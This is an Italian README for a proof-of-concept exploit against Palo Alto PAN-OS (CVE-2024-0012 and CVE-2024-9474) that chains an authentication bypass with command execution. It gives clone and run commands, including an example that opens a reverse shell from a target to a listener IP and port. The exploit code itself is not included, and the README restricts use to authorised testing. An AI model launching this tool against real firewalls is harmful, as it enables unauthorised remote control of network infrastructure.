
Questa PoC è mirata alle vulnerabilità in Palo Alto PAN-OS, in particolare CVE-2024-0012 e CVE-2024-9474. Questo script automatizza il processo di sfruttamento, inclusa la creazione del payload, la consegna in blocchi e l'esecuzione senza interruzioni dei comandi.
Questo script Proof-of-Concept (PoC) prende di mira le vulnerabilità in Palo Alto PAN-OS, in particolare CVE-2024-0012 e CVE-2024-9474, automatizzando il processo di sfruttamento, inclusi il bypass dell'autenticazione, la creazione del payload, la consegna in chunk e l'esecuzione di comandi senza interruzioni.
⚠️ Questo script è destinato esclusivamente a scopi educativi e di test di penetrazione autorizzati. L'uso non autorizzato è illegale.
git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoC
python -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>
<TARGET_URL>: L'URL del target, includendo http o https.<LISTENER_IP>: Il tuo indirizzo IP per il listener della reverse shell.<LISTENER_PORT>: La porta per il listener della reverse shell.python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444
Ottieni la spiegazione completa e gli approfondimenti tecnici su questo PoC da questo Articolo su Medium!
Questo PoC è destinato esclusivamente a scopi educativi e test di sicurezza autorizzati. L'uso non autorizzato di questo strumento è severamente vietato. Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo strumento.